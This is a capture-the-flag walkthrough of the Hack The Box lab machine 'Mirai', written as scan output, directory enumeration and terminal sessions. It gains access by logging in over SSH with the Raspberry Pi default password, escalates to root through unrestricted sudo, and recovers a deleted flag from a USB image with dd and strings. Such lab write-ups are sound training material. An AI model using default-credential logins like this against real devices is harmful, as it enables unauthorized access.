Mirai

Back

Ports scan

masscan

root@kali:~/HTB/Machines/Mirai# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.48 --rate=1000


Starting masscan 1.0.5 at 2019-11-19 19:06:47 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 32469/tcp on 10.10.10.48
Discovered open port 22/tcp on 10.10.10.48
Discovered open port 32414/udp on 10.10.10.48
Discovered open port 32400/tcp on 10.10.10.48
Discovered open port 1479/tcp on 10.10.10.48
Discovered open port 53/tcp on 10.10.10.48
Discovered open port 80/tcp on 10.10.10.48

nmap

root@kali:~/HTB/Machines/Mirai# nmap -sC -sV -p22,53,80,1479,32469,32400,U:32414 10.10.10.48
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-19 14:14 EST
Nmap scan report for mirai.htb (10.10.10.48)
Host is up (0.044s latency).


PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
|   1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
|   2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
|   256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_  256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp    open  domain  dnsmasq 2.76
| dns-nsid:
|_  bind.version: dnsmasq-2.76
80/tcp    open  http    lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Website Blocked
1479/tcp  open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open  http    Plex Media Server httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
|_http-title: Unauthorized
32469/tcp open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.33 seconds

Web

The web server seems to be a Pi-Home 3.1.4. https://en.wikipedia.org/wiki/Pi-hole. It's written in PHP and bash, it's a anti advertising, by DNS sink-hole.

It is designed for use on embedded devices with network capability, such as the Raspberry Pi,[3][7] but it can be used on other machines running Linux and cloud implementations.

root@kali:~/HTB/Machines/Mirai# python3 ../../Utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "php,txt" -f -t 100 -u http://mirai.htb


 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )


Extensions: php, txt | HTTP method: get | Threads: 100 | Wordlist size: 661562


Error Log: /root/HTB/Utils/dirsearch/logs/errors-19-11-25_08-15-16.log


Target: http://mirai.htb


[08:15:17] Starting:
[08:15:23] 200 -   14KB - /admin/
[08:16:35] 200 -   13B  - /versions/
Task Completed

The second web server is located on port 32400.

It's a Plex media server.

On the admin folder from the dirsearch enumeration, the admin console of Pi-Hole is found.

User Flag

Previous elements indicate that we are facing a raspberry PI. Let's try default user (user pi and password raspberry).

root@kali:~# ssh pi@mirai.htb
The authenticity of host 'mirai.htb (10.10.10.48)' can't be established.
ECDSA key fingerprint is SHA256:UkDz3Z1kWt2O5g2GRlullQ3UY/cVIx/oXtiqLPXiXMY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'mirai.htb' (ECDSA) to the list of known hosts.
pi@mirai.htb's password: 


The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.


Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 27 14:47:50 2017 from localhost


SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set   a new password.


SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set   a new password.
pi@raspberrypi:~ $ whoami
pi
pi@raspberrypi:~ $ cat Desktop/user.txt
<USER_FLAG>

Root flag

Usually the pi user has sudo rights.

pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin


User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL




pi@raspberrypi:~/Desktop $ sudo -i


SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.




SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.


root@raspberrypi:~# cat root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...

It was too easy.

root@raspberrypi:~# df -h
Filesystem      Size  Used Avail Use% Mounted on
aufs            8.5G  2.8G  5.3G  34% /
tmpfs           100M  4.8M   96M   5% /run
/dev/sda1       1.3G  1.3G     0 100% /lib/live/mount/persistence/sda1
/dev/loop0      1.3G  1.3G     0 100% /lib/live/mount/rootfs/filesystem.squashfs
tmpfs           250M     0  250M   0% /lib/live/mount/overlay
/dev/sda2       8.5G  2.8G  5.3G  34% /lib/live/mount/persistence/sda2
devtmpfs         10M     0   10M   0% /dev
tmpfs           250M  8.0K  250M   1% /dev/shme
tmpfs           5.0M  4.0K  5.0M   1% /run/lock
tmpfs           250M     0  250M   0% /sys/fs/cgroup
tmpfs           250M  8.0K  250M   1% /tmp
/dev/sdb        8.7M   93K  7.9M   2% /media/usbstick
tmpfs            50M     0   50M   0% /run/user/999
tmpfs            50M     0   50M   0% /run/user/1000


root@raspberrypi:~# cd /media/usbstick
root@raspberrypi:/media/usbstick# ls -ltr
total 13
drwx------ 2 root root 12288 Aug 14  2017 lost+found
-rw-r--r-- 1 root root   129 Aug 14  2017 damnit.txt
root@raspberrypi:/media/usbstick# cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?


-James

Playing hide and seek :)

root@raspberrypi:/media/usbstick# cd ..

Dump the partition to a file.

root@raspberrypi:/media# dd if=/dev/sdb of=img
20480+0 records in
20480+0 records out
10485760 bytes (10 MB) copied, 0.077273 s, 136 MB/s

Look inside for human readable characters.

root@raspberrypi:/media# strings img
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
<ROOT_FLAG>
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James

References

• https://www.raspberrypi.org/documentation/linux/usage/users.md

Daniel Simao 18:03, 21 November 2019 (EST)